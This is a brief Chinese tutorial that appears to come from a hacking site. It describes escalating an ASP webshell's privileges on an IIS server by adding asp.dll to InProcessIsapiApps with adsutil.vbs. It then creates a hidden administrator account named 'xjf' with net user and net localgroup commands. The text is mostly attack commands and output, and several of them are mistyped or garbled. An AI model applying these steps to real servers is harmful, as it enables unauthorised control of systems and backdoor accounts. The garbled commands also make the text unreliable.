提升asp木马权限的vbs篇

把解释asp脚本 C:\WINNT\32\inetsrv\asp.dll
这个ISAPI添加到/LM/W3SVCInProcessIsapiApps里面
首先我看看iis配置和asp木马权限

adsutil.vbs get /W3SVC/InProcessIsapiApps
先用下面命令取得当前InProcessIsapiApps列表:
c:\winnt\sytem32\inetsrv>cscript.exe adsutil.vbs get /W3SVC/InProcessIsapiApps
inprocessisapiapps :(LIST) (5 Items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
---没有asp
然后把asp.dll加进/LM/W3SVCInProcessIsapiApps里面
c:\winnt\sytem32\inetsrv>adsutil.vbs /W3SVC/InProcessIsapiApps
"c:\winnt\system32\inetsrv\asp.asp"
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"

现在看看asp木马权限
我们加个用户xjf并提升为管理员看看.
net user xjf ***** /add
net lcoalgroup administrators xjf /add----哈哈...成功了.

不过需要注意adsutil.vbs只能设不能改所以用adsutil.vbs时候定要把原先也加上,否则原先就会丢失区别条目的间用空格分开最后,谢谢mix提供思路...




  • 篇文章: 熟练掌握runas安全调试及运行

  • 篇文章: txt炸弹
  • Tags: 

    延伸阅读

    最新评论

    发表评论